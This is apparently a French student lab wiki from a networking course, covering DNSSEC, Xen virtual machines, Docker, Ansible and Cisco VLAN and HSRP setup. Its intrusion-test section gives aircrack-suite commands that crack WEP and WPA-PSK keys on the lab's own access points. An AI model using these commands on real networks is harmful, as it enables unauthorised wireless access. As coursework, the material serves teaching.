 $TTL	604800&lt;br /&gt;
 '''$include /etc/bind/mycoplasma2.site.dnssec/mycoplasma2.site-ksk.key'''&lt;br /&gt;
 '''$include /etc/bind/mycoplasma2.site.dnssec/mycoplasma2.site-zsk.key'''&lt;br /&gt;
 @	IN	SOA	ns.chlamydiae.site. root.mycoplasma2.site (&lt;br /&gt;
  			4	; Serial&lt;br /&gt;
 			604800	; Refresh&lt;br /&gt;
 			86400	; Retry&lt;br /&gt;
 			2419200	; Expire&lt;br /&gt;
 			604800 )	; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 	IN	NS	ns.mycoplasma2.site.&lt;br /&gt;
 	IN	NS	ns6.gandi.net.&lt;br /&gt;
 @      IN      A       193.48.57.178&lt;br /&gt;
 ns	IN	A	193.48.57.178&lt;br /&gt;
 www	IN	A	193.48.57.178&lt;br /&gt;
&lt;br /&gt;
On signe les enregistrements de la zone en exécutant la commande suivante :&lt;br /&gt;
 dnssec-signzone -o mycoplasma2.site -k mycoplasma2.site-ksk ../mycoplasma2.site mycoplasma2.site-zsk&lt;br /&gt;
&lt;br /&gt;
Dernière étape, il fait ajouter le chemin du fichier pour utiliser le fichier de zone signé :&lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~# cat /etc/bind/named.conf.local &lt;br /&gt;
&lt;br /&gt;
 zone &amp;quot;mycoplasma2.site&amp;quot; {&lt;br /&gt;
        type master;&lt;br /&gt;
        '''file &amp;quot;/etc/bind/mycoplasma2.site.signed&amp;quot;;''' &lt;br /&gt;
        allow-transfer {217.70.177.40;}; &lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 service bind9 restart&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Nous vérifions sous dnsviz.net le bon fonctionnement du DNSSEC :&lt;br /&gt;
[[Fichier:groupe2_dnsViz.png|center|500px]]&lt;br /&gt;
&lt;br /&gt;
===Serveur Freeradius===&lt;br /&gt;
&lt;br /&gt;
==Ferme de serveurs Web==&lt;br /&gt;
Il faut implanter une architecture d’équilibrage de charge pour un site Web.&lt;br /&gt;
&lt;br /&gt;
===Architecture générale de la ferme===&lt;br /&gt;
Pour ce faire, chaque binôme a créé une nouvelle machine virtuelle Xen qui hébergera un serveur Web. Ainsi chaque binôme pourra disposer de plusieurs serveurs Web proposant exactement le même site sur plusieurs machines différentes. Ces serveurs Web ne seront pas directement disponibles d’Internet mais au travers d’un équilibreur de charge tournant sur leur machine virtuelle principale.&lt;br /&gt;
&lt;br /&gt;
'''Nom de la Machine Virtuelle ''' : private-mycoplasma&lt;br /&gt;
&lt;br /&gt;
'''Commandes''': &lt;br /&gt;
La MV doit être créée sur Cordouan.&lt;br /&gt;
 root@zabethX:~# ssh root@cordouan.insecserv.deule.net &lt;br /&gt;
&lt;br /&gt;
 root@cordouan:~# xen-create-image --hostname=private-mycoplasma --ip=ip 192.168.0.2 --dir=/usr/local/xen&lt;br /&gt;
 root@cordouan:~# xl create private-mlycoplasma.cfg&lt;br /&gt;
&lt;br /&gt;
Il faut suivre les logs de la création de la machine virtuelle avec le fichier suivant:&lt;br /&gt;
 root@cordouan:~# tail -f /var/log/xen-tools/private-mycoplasma.log&lt;br /&gt;
&lt;br /&gt;
Pour accèder une première fois à la machine virtuelle, il faut utiliser cette commande car SSH n'est pas encore autorisé.&lt;br /&gt;
 root@cordouan:~# xl console private-mycoplasma&lt;br /&gt;
&lt;br /&gt;
Pour l'activer voici les modifications, il faut remplacer la ligne suivante de ce fichier /etc/ssh/sshd_config :&lt;br /&gt;
 &amp;quot; #PermitRootLogin prohibit-password&amp;quot;  '''par'''  &amp;quot; PermitRootLogin yes&amp;quot; &lt;br /&gt;
&lt;br /&gt;
Il est possible de se connecter en SSH  et de paramétrer le proxy : &lt;br /&gt;
 root@cordouan:~# ssh root@192.168.0.2&lt;br /&gt;
 root@private-mycoplasma:~# export http_proxy=http://proxy.plil.fr:3128&lt;br /&gt;
 root@private-mycoplasma:~# export https_proxy=http://proxy.plil.fr:3128&lt;br /&gt;
 root@private-mycoplasma:~# xen-create-image --hostname=herpesgenital --dhcp --dir=/usr/local/xen --force&lt;br /&gt;
&lt;br /&gt;
Il faut modifier l'adresse mac, pour avoir une adresse mac unique pour chaque binôme, et il faut configurer le bridge.&lt;br /&gt;
 vif = [ 'mac=00:16:3E:2B:FF:6A,bridge=IMA5sc-priv' ]&lt;br /&gt;
&lt;br /&gt;
Voici notre nouvelle structure :&lt;br /&gt;
[[Fichier:G2_Structure.png|center|800px]]&lt;br /&gt;
&lt;br /&gt;
Pour y arriver, il faut modifier les fichiers /etc/network/interfaces des deux machines virtuelles avec les adresses, Gateway, et netmask marque sur la photo ci-dessus. Et valider les modifications avec les commandes habituelles : ifdown eth'''i''' et ifup eth'''i'''&lt;br /&gt;
&lt;br /&gt;
=== Mascarade ===&lt;br /&gt;
&lt;br /&gt;
 iptables -P FORWARD DROP&lt;br /&gt;
 iptables -A FORWARD -j ACCEPT -s 192.168.0.0/24&lt;br /&gt;
 iptables -A FORWARD -j ACCEPT -d 192.168.0.0/24&lt;br /&gt;
 iptables -t nat -A POSTROUTING -j MASQUERADE -s 192.168.0.0/24&lt;br /&gt;
 echo 1 &amp;gt; /proc/sys/net/ipv4/ip_forward&lt;br /&gt;
 apt install iptables-persistent&lt;br /&gt;
 &lt;br /&gt;
Il faut ensuite décommenter &lt;br /&gt;
 net.ipv4.ipforward=1&lt;br /&gt;
&lt;br /&gt;
=== Création du conteneur ===&lt;br /&gt;
&lt;br /&gt;
Il est important dans cette partie que tous les binômes se mettent d'accord pour installer le même package de docker &lt;br /&gt;
 root@mycoplasma:~/#  ansible-galaxy install geerlingguy.docker&lt;br /&gt;
&lt;br /&gt;
Voici le fichier DockerFile que l'on a codé :&lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~/test# cat docker/Dockerfile &lt;br /&gt;
&lt;br /&gt;
 FROM centos:latest&lt;br /&gt;
 MAINTAINER NewstarCorporation&lt;br /&gt;
 RUN yum -y install httpd&lt;br /&gt;
 COPY mycoplasma/index.html /var/wwww/html/index.html&lt;br /&gt;
 CMD [&amp;quot;/usr/sbin/httpd&amp;quot;, &amp;quot;-D&amp;quot;, &amp;quot;FOREGROUND&amp;quot;]&lt;br /&gt;
 EXPOSE 80&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On a eu le problème suivant lorsqu'on souhaite visiter notre site : &lt;br /&gt;
&lt;br /&gt;
[[Fichier:G2_mycoplasmaSite.png|center|900px]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 root@corduan:~/# docker ps =&amp;gt; Notre docker &amp;quot;mycoplasma&amp;quot;  tourne donc  ce n'est pas le problème.&lt;br /&gt;
&lt;br /&gt;
 root@corduan:~/# docker exec -it &amp;lt;CONTAINER ID&amp;gt; /bash/bin &lt;br /&gt;
 root@&amp;lt;CONTAINER ID&amp;gt;:~/# ls /var/www/html &lt;br /&gt;
&lt;br /&gt;
Avec cette dernière commande, on peut voir que le fichier index.html ne s'est pas copié malgré les commandes du Dockerfile. Pourtant le Docker build s'est exécuté sans afficher d'erreurs. On peut voir les logs pour avoir une idée : &lt;br /&gt;
  root@corduan:~/# docker logs &amp;lt;CONTAINER ID&amp;gt;&lt;br /&gt;
Voici le résultat : &lt;br /&gt;
 AH00558: httpd: Could not reliably determine the server's fully qualified domain name, using 172.17.0.5. Set the 'ServerName' directive globally to suppress this message&lt;br /&gt;
&lt;br /&gt;
=== Configuration des serveurs internes ===&lt;br /&gt;
&lt;br /&gt;
===Equilibreur de charge===&lt;br /&gt;
&lt;br /&gt;
==Tests d’intrusion==&lt;br /&gt;
&lt;br /&gt;
=== Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
Pour scanner l'environnement Wi-Fi, on utilise l'outil airodump-ng. On remarque qu'il y a deux types de wifi, les cracottes avec un c et les kracottes avec un k.&lt;br /&gt;
On lance l'interface en mode moniteur : &lt;br /&gt;
 airmon-ng start  wlan0mon&lt;br /&gt;
 airodump-ng --encrypt wep wlan0mon&lt;br /&gt;
&lt;br /&gt;
On a choisi de casser la clé WEP de la cracotte5 sur le channel 2, on enregistre les paquets dans webPack.&lt;br /&gt;
 airodump-ng -c 2 –-bssid 04:DA:D2:9C:5O:5A -w wepPack wlan0mon&lt;br /&gt;
&lt;br /&gt;
La commande suivante permet de se faire passer pour un client afin de générer de l'activité sur le réseau.&lt;br /&gt;
 aireplay-ng --fakeauth 30 -a 04:DA:D2:9C:5O:5A wlan0mon&lt;br /&gt;
&lt;br /&gt;
On utilise les paquets enregistrés pour réaliser le cassage:&lt;br /&gt;
 aircrack-ng wepDico*.cap&lt;br /&gt;
&lt;br /&gt;
[[Fichier:g2_wep.png|center|600 px]]&lt;br /&gt;
&lt;br /&gt;
=== Cassage de mot de passe WPA-PSK par force brute ===&lt;br /&gt;
Il faut lancer la commande ip a : récupérer le nom de l'interface wifi : &amp;quot;&amp;quot;wlx40a5ef0f6518&amp;quot;&amp;quot;. Il faut le lancer avec la commande :&lt;br /&gt;
 airmon-ng start wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite écouter le réseau, on récupère alors le channel(2), le nom du wifi, le BSSID (04:DA:D2:9C:5O:5A) avec la commande suivante:&lt;br /&gt;
 airodump-ng --encrypt wpa wlan0mon&lt;br /&gt;
Nous avons choisi de cracker &amp;quot;kracote03&amp;quot;&lt;br /&gt;
&lt;br /&gt;
 airodump-ng wlan0mon --bssid 04:DA:D2:9C:5O:5A --ch 2 -w capture&lt;br /&gt;
&lt;br /&gt;
Il faut l'arreter une fois qu'on obtient un handshake &lt;br /&gt;
&lt;br /&gt;
[[Fichier:G2_WPA.png| 800 px|center]]&lt;br /&gt;
&lt;br /&gt;
Pour générer un dictionnaire, on a besoin de la commande suivante : &lt;br /&gt;
 sudo apt-get update&lt;br /&gt;
 sudo apt-get install crunch&lt;br /&gt;
&lt;br /&gt;
 crunch 8 8 -o dico.txt 0123456789&lt;br /&gt;
&lt;br /&gt;
* 8 8 : donne des codes de 8 caractères au minimum et au maximum&lt;br /&gt;
&lt;br /&gt;
On lance cette commande : &lt;br /&gt;
 airodump-ng -c 2 --bssid 04:DA:D2:9C:5O:5A -w ./home/pifou/crack wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Voici une capture de la commande :&lt;br /&gt;
 aircrack crack/capture.cap -w dico.txt &lt;br /&gt;
[[Fichier:G2_catch.png|center]]&lt;br /&gt;
&lt;br /&gt;
On remarque ce la photo ci dessus que la commande a pris 21 min et 42 sec.&lt;br /&gt;
&lt;br /&gt;
== Partie  ASR ==&lt;br /&gt;
&lt;br /&gt;
=== Ansible ===&lt;br /&gt;
&lt;br /&gt;
Ansible permet l'automatisation par connexion sans mot de passe.&lt;br /&gt;
Il faut d'abord générer une clef asymétrique :&lt;br /&gt;
 ssh-keygen -t rsa&lt;br /&gt;
&lt;br /&gt;
Installation de la clef publique sur les machines virtuelles 192.168.0.1 à 192.168.0.6  :&lt;br /&gt;
 cat .ssh/id_rsa.pub | ssh 192.168.0.1 &amp;quot;cat &amp;gt;&amp;gt; /root/.ssh/authorized_keys2&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Il faut  installer Ansible : &lt;br /&gt;
 apt install ansible&lt;br /&gt;
====Hosts====&lt;br /&gt;
Ensuite il faut rédiger l'inventaire ( /etc/ansible/hosts ) c'est un fichier yaml, il faut très attention à la syntaxe. Ce fichier regroupe le parc informatique :&lt;br /&gt;
&lt;br /&gt;
 all:&lt;br /&gt;
 hosts:&lt;br /&gt;
  interne:&lt;br /&gt;
    ansible_host: 192.168.0.2&lt;br /&gt;
 children:&lt;br /&gt;
  serveur-web:&lt;br /&gt;
   hosts:&lt;br /&gt;
    192.168.0.[1:6]&lt;br /&gt;
&lt;br /&gt;
====Playbooks====&lt;br /&gt;
&lt;br /&gt;
Maintenant qu'on a défini toutes les machines dans notre parc et qu'on peut se connecter automatique, on peut exécuter une commande à distance sur tout le parc à l'aide d'Ansible.&lt;br /&gt;
Un &amp;quot;playbook&amp;quot; c'est une liste des tâches à effectuer sur ces machines.&lt;/div&gt;</summary>
		<author><name>Aaitmouh</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2019/2020_G2&amp;diff=51988</id>
		<title>TP sysres IMA5sc 2019/2020 G2</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2019/2020_G2&amp;diff=51988"/>
				<updated>2020-01-02T22:29:21Z</updated>
		
		<summary type="html">&lt;p&gt;Aaitmouh : /* Création des Réseaux virtuels */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;__TOC__&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot;/&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Présentation générale=&lt;br /&gt;
&lt;br /&gt;
Travaux pratiques protocoles avancés. Cet atelier consiste en la réalisation d’une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6.&lt;br /&gt;
&lt;br /&gt;
Le cours se trouve à cette [https://rex.plil.fr/Enseignement/Reseau/Reseau.IMA5sc/ adresse]&lt;br /&gt;
Le sujet du TP se trouve à cette [https://rex.plil.fr/Enseignement/Reseau/Protocoles.IMA5sc/reseau.html adresse]&lt;br /&gt;
&lt;br /&gt;
=Réalisation du TP=&lt;br /&gt;
&lt;br /&gt;
== Installation dans la machine virtuelle Xen ==&lt;br /&gt;
Nous avons acheté notre domaine : mycoplasma.site sur le site gandi. Il faut créer la machine virtuelle Xen Linux sur le ''dom0 cordouan.insecserv.deule.net''&lt;br /&gt;
&lt;br /&gt;
Donc il faut se connecter en shh à Cordouan: &lt;br /&gt;
 ssh root@cordouan.insecserv.deule.net&lt;br /&gt;
&lt;br /&gt;
Puis créer notre machine virtuelle : &lt;br /&gt;
 xen-create-image --hostname=mycoplasma --dhcp --dir=/usr/local/xen --dist=buster&lt;br /&gt;
 xl create mycoplasma.cfg&lt;br /&gt;
&lt;br /&gt;
On a ensuite installer les paquetages nécessaires pour SSH, le serveur Web apache2 et le serveur DNS bind :&lt;br /&gt;
 sudo apt-get install openssh-server&lt;br /&gt;
 sudo apt-get install apache2&lt;br /&gt;
 sudo apt-get install -y bind9&lt;br /&gt;
&lt;br /&gt;
Pour afficher les logs et savoir si l'installation à bien lieu : &lt;br /&gt;
   tail -f /var/log/xen-tools/mycoplasma.log&lt;br /&gt;
=== Accès Internet et Permettre SSH ===&lt;br /&gt;
Une fois la VM créée (semaine 1), il faut installer les packages, donc il faut lui donner l'accès à internet. Il faut modifier le fichier suivant etc/network/interfaces. Pour enregistrer les modifications, il faut exécuter les commandes: if down eth0, ifup eth0.&lt;br /&gt;
 &lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
  address 193.48.57.178&lt;br /&gt;
  netmask 255.255.255.240&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour le moment, pour se connecter à la Machine virtuelle, on utilise la commande suivante: &lt;br /&gt;
 xl console mycoplasma&lt;br /&gt;
&lt;br /&gt;
====SSH====&lt;br /&gt;
Mais il y a une seconde façon d'accéder à notre VM: c'est en utilisant SSH. Pour le faire il faut remplacer la ligne suivante :&lt;br /&gt;
 &amp;quot; #PermitRootLogin prohibit-password&amp;quot; &lt;br /&gt;
par &lt;br /&gt;
 &amp;quot; PermitRootLogin yes&amp;quot; &lt;br /&gt;
de ce fichier etc/ssh/sshd_config.&lt;br /&gt;
&lt;br /&gt;
== Architecture réseau ==&lt;br /&gt;
&lt;br /&gt;
=== L’architecture générale ===&lt;br /&gt;
[[Fichier:mejbar-aitmouheb-infra-generale.png|right|180 px|thumb]]&lt;br /&gt;
L'objectif que l'on souhaite réaliser dans cette partie est une architecture capable de résister à la défaillance de quelques uns des équipements réseau qui la composent par le biais de la redondance.&lt;br /&gt;
&lt;br /&gt;
Nous disposons, pour la réalisation, de deux commutateurs et de deux routeurs et deux bornes wifi répartis entre les deux salles E304 et E306. &lt;br /&gt;
&lt;br /&gt;
Nous avons sur les deux terminaisons de notre architecture:&lt;br /&gt;
&lt;br /&gt;
* Le serveur XEN qui abrite des machines virtuelles avec les différents services qui y sont implantés.&lt;br /&gt;
* Le réseau de l'école.&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
Le schéma de principe ci-joint, résume l'architecture proposée.&lt;br /&gt;
&lt;br /&gt;
On peut ainsi voir à partir de ce schéma que tant que nous avons au minimum un routeur et un commutateur fonctionnels l’infrastructure pourra toujours assurer le service&lt;br /&gt;
&lt;br /&gt;
Entre autres, on doit satisfaire le cahier des charges suivant:&lt;br /&gt;
* Un routage IPv4&lt;br /&gt;
* Un routage IPv6&lt;br /&gt;
* Interconnexion avec Internet (IPv4)&lt;br /&gt;
* Interconnexion avec Internet (IPv6)&lt;br /&gt;
* Sécurisation du réseau en implantant le protocol VRRP sur les routeurs.&lt;br /&gt;
* Confguration des bornes wifi&lt;br /&gt;
&lt;br /&gt;
===Organisation du travail ===&lt;br /&gt;
[[Fichier:mejbar-aitmouheb-infra-E304.png|right|180 px|thumb]]&lt;br /&gt;
Nous avons pris l'initiative de nous répartir la réalisation de l'infrastructure et notre groupe s'est principalement chargé de l'implémentation sur la partie E304.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Sur cette partie nous devons donc configurer le commutateur (COM-1) pour:&lt;br /&gt;
* Communiquer avec la serveur XEN&lt;br /&gt;
* Communiquer avec le routeur R1 en E304 et le R2 en E306.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Et configurer le routeur R1 pour:&lt;br /&gt;
* L'interconnexion des deux commutateurs COM-1 et COM-2 avec le réseau de l'école et internet &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Le schéma proposé à droite résume le choix des interfaces pour la réalisation de l'interconnexion des équipements.&lt;br /&gt;
&lt;br /&gt;
===Réalisation===&lt;br /&gt;
Rappelons la table des adressages convenue en phase d'architecture:&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Nom !! VLAN !! Réseau IPV4 !! Réseau IPV6 !! IP routeur 1 !! IP routeur 2 !! Routeur virtuel !! Nom VM !! IP VM !! IP VM Private&lt;br /&gt;
|-&lt;br /&gt;
| XEN&lt;br /&gt;
| 200&lt;br /&gt;
| 193.48.57.176/28 &lt;br /&gt;
| 2001:660:4401:60AB::/64 &lt;br /&gt;
| 193.48.57.188/28&lt;br /&gt;
| 193.48.57.189/28&lt;br /&gt;
| 193.48.57.190/28&lt;br /&gt;
| ***&lt;br /&gt;
| 193.48.57.176/28&lt;br /&gt;
| ***&lt;br /&gt;
|-&lt;br /&gt;
| Interconnection&lt;br /&gt;
| 131&lt;br /&gt;
| 10.60.100.0/24&lt;br /&gt;
| ***&lt;br /&gt;
| 10.60.100.1/24&lt;br /&gt;
| 10.60.100.2/24&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 1&lt;br /&gt;
| 101 &lt;br /&gt;
| 10.60.101.0/24&lt;br /&gt;
| 2001:660:4401:60A1::/64 &lt;br /&gt;
| 10.60.101.1/24&lt;br /&gt;
| 10.60.101.2/24&lt;br /&gt;
| 10.60.101.3/24&lt;br /&gt;
| 6phil&lt;br /&gt;
| 193.48.57.177/28&lt;br /&gt;
| 192.168.0.1&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 2&lt;br /&gt;
| 102&lt;br /&gt;
| 10.60.102.0/24&lt;br /&gt;
| 2001:660:4401:60A2::/64 &lt;br /&gt;
| 10.60.102.1/24&lt;br /&gt;
| 10.60.102.2/24&lt;br /&gt;
| 10.60.102.3/24&lt;br /&gt;
| mycoplasma&lt;br /&gt;
| 193.48.57.178/28&lt;br /&gt;
| 192.168.0.2&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 3&lt;br /&gt;
| 103 &lt;br /&gt;
| 10.60.103.0/24&lt;br /&gt;
| 2001:660:4401:60A3::/64&lt;br /&gt;
| 10.60.103.1/24&lt;br /&gt;
| 10.60.103.2/24&lt;br /&gt;
| 10.60.103.3/24&lt;br /&gt;
| herpesgenital&lt;br /&gt;
| 193.48.57.179/28&lt;br /&gt;
| 192.168.0.3&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 4&lt;br /&gt;
| 104 &lt;br /&gt;
| 10.60.104.0/24&lt;br /&gt;
| 2001:660:4401:60A4::/64 &lt;br /&gt;
| 10.60.104.1/24&lt;br /&gt;
| 10.60.104.2/24&lt;br /&gt;
| 10.60.104.3/24&lt;br /&gt;
| chlamydiae&lt;br /&gt;
| 193.48.57.180/28&lt;br /&gt;
| 192.168.0.4&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 5&lt;br /&gt;
| 105 &lt;br /&gt;
| 10.60.105.0/24&lt;br /&gt;
| 2001:660:4401:60A5::/64 &lt;br /&gt;
| 10.60.105.1/24&lt;br /&gt;
| 10.60.105.2/24&lt;br /&gt;
| 10.60.105.3/24&lt;br /&gt;
| chaudepisse&lt;br /&gt;
| 193.48.57.181/28&lt;br /&gt;
| 192.168.0.5&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 6&lt;br /&gt;
| 106 &lt;br /&gt;
| 10.60.106.0/24&lt;br /&gt;
| 2001:660:4401:60A6::/64 &lt;br /&gt;
| 10.60.106.1/24&lt;br /&gt;
| 10.60.106.2/24&lt;br /&gt;
| 10.60.106.3/24&lt;br /&gt;
| blennoragie&lt;br /&gt;
| 193.48.57.182/28&lt;br /&gt;
| 192.168.0.6&lt;br /&gt;
|-&lt;br /&gt;
| Autres&lt;br /&gt;
| 300&lt;br /&gt;
| 10.60.200.0/24&lt;br /&gt;
| 2001:660:4401:60AA::/64 &lt;br /&gt;
| 10.60.200.1/24&lt;br /&gt;
| 10.60.200.2/24&lt;br /&gt;
| 10.60.200.3/24&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Comme on peut le voir, les VMs exposées possèdent chacune deux adresses IPv4 sur deux réseaux différents:&lt;br /&gt;
#Le réseau routé     :  193.48.57.176/28      (Class C)&lt;br /&gt;
#Le réseau non-routé :  10.10.0.0/16          (Class A)&lt;br /&gt;
&lt;br /&gt;
Nous devons allouer sur le réseau non-routé, dit privé, un VLAN pour chaque groupe pour qu'il puisse y connecter son client Wifi en plus des VLANs fonctionnels.&lt;br /&gt;
 &lt;br /&gt;
====Configuration du commutateur 1 (COM-1)====&lt;br /&gt;
&lt;br /&gt;
=====Création des VLANs=====&lt;br /&gt;
Pour la création des VLANs nous utilisons la suite de commandes ci-dessous:&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  vlan &amp;lt;NUMERO&amp;gt;&lt;br /&gt;
   name &amp;lt;NOM&amp;gt;&lt;br /&gt;
   exit&lt;br /&gt;
  exit&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
avec les couples de valeurs:&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! &amp;lt;NUMERO&amp;gt; !! &amp;lt;NOM&amp;gt; &lt;br /&gt;
|-&lt;br /&gt;
| 101&lt;br /&gt;
| VLAN0101&lt;br /&gt;
|-&lt;br /&gt;
| 102&lt;br /&gt;
| VLAN0102 &lt;br /&gt;
|-&lt;br /&gt;
| 103&lt;br /&gt;
| VLAN0103&lt;br /&gt;
|-&lt;br /&gt;
| 104&lt;br /&gt;
| VLAN0104&lt;br /&gt;
|-&lt;br /&gt;
| 105&lt;br /&gt;
| VLAN0105&lt;br /&gt;
|-&lt;br /&gt;
| 106&lt;br /&gt;
| VLAN0106&lt;br /&gt;
|-&lt;br /&gt;
| 131&lt;br /&gt;
| INTERCNX&lt;br /&gt;
|-&lt;br /&gt;
| 200&lt;br /&gt;
| XEN&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers XEN=====&lt;br /&gt;
Cette connexion doit faire transiter les différents VLANs et doit donc être en Trunk.&lt;br /&gt;
&lt;br /&gt;
'''Configuration de l'interface'''&lt;br /&gt;
 conf t&lt;br /&gt;
  interface GigabitEthernet1/1&lt;br /&gt;
   switchport&lt;br /&gt;
   switchport trunk encapsulation dot1q         # On utilise le standard 802.1q pour l'encapsulation&lt;br /&gt;
   switchport mode trunk                        # On met l'interface en mode Trunk&lt;br /&gt;
   no shut&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers R1=====&lt;br /&gt;
'''Configuration de l'interface'''&lt;br /&gt;
 conf t&lt;br /&gt;
  interface GigabitEthernet4/1&lt;br /&gt;
   switchport&lt;br /&gt;
   switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers R2=====&lt;br /&gt;
'''Configuration de l'interface'''&lt;br /&gt;
 conf t&lt;br /&gt;
 interface GigabitEthernet1/2&lt;br /&gt;
  switchport&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers Borne Wifi=====&lt;br /&gt;
'''Configuration de l'interface'''&lt;br /&gt;
 conf t&lt;br /&gt;
  interface GigabitEthernet4/4&lt;br /&gt;
   switchport&lt;br /&gt;
   switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
====Configuration du Routeur 1 (R1)====&lt;br /&gt;
&lt;br /&gt;
=====Création des Réseaux virtuels=====&lt;br /&gt;
La notion de Bridge Domain Interface (BDI)&lt;br /&gt;
&lt;br /&gt;
HSRP: Hot standby router protocol [https://en.wikipedia.org/wiki/Hot_Standby_Router_Protocol plus]&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  interface BDI101&lt;br /&gt;
   ip address 10.60.101.1 255.255.255.0                # adresse IPv4 locale&lt;br /&gt;
   standby version 2                                   # utilisation du protocol HSRP version 2 pour la haute disponibilité de l'architecture&lt;br /&gt;
   standby 101 ip 10.60.101.3                          # &lt;br /&gt;
   standby 101 preempt&lt;br /&gt;
   ipv6 address 2001:660:4401:60A1::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60A1::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   no shut &lt;br /&gt;
   exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
  interface BDI102&lt;br /&gt;
   ip address 10.60.102.1 255.255.255.0&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 102 ip 10.60.102.3&lt;br /&gt;
   standby 102 preempt&lt;br /&gt;
   ipv6 address 2001:660:4401:60A2::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60A2::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   no shut &lt;br /&gt;
   exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI103&lt;br /&gt;
  ip address 10.60.103.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 103 ip 10.60.103.3&lt;br /&gt;
  standby 103 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A3::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A3::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI104&lt;br /&gt;
  ip address 10.60.104.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 104 ip 10.60.104.3&lt;br /&gt;
  standby 104 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A4::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A4::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI105&lt;br /&gt;
  ip address 10.60.105.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 105 ip 10.60.105.3&lt;br /&gt;
  standby 105 priority 150&lt;br /&gt;
  standby 105 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A5::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A5::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI106&lt;br /&gt;
  ip address 10.60.106.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 106 ip 10.60.106.3&lt;br /&gt;
  standby 106 priority 150&lt;br /&gt;
  standby 106 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A6::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A6::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI131&lt;br /&gt;
